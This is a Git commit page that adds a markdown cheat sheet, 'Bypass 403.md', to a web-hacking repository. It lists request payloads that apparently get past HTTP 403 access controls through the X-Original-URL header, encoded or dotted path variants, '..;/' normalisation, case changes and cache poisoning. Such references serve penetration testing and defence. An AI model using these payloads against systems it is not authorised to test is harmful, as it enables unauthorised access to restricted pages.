vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Bypass 403.md

Browse Source
This commit is contained in:
Mehdi 2023-09-15 16:14:47 +03:30 committed by GitHub
parent f18326c1fa
commit 689daa4bfe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 66 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
Bypass 403.md Normal file
View File

@ -0,0 +1,66 @@
# Bypass 403 (Forbidden)
### Using `X-Original-URL` header
```bash
# Normal Request (403)
GET /admin HTTP/1.1
Host: target.com
# Try this to bypass (200)
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
```
### Appending `%2e` after the first slash
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/%2e/admin
```
### Try add dot `.` slash `/` and semicolon `;` in the URL
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/secret/.
http://target.com//secret//
http://target.com/./secret/..
http://target.com/;/secret
http://target.com/.;/secret
http://target.com//;//secret
```
### Add `..;/` after the directory name
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/admin..;/
```
### Try to uppercase the alphabet in the url
```bash
# Normal Request (403)
http://target.com/admin
# Try this to bypass (200)
http://target.com/aDmIN
```
## Via Web Cache Poisoning
```bash
GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin
```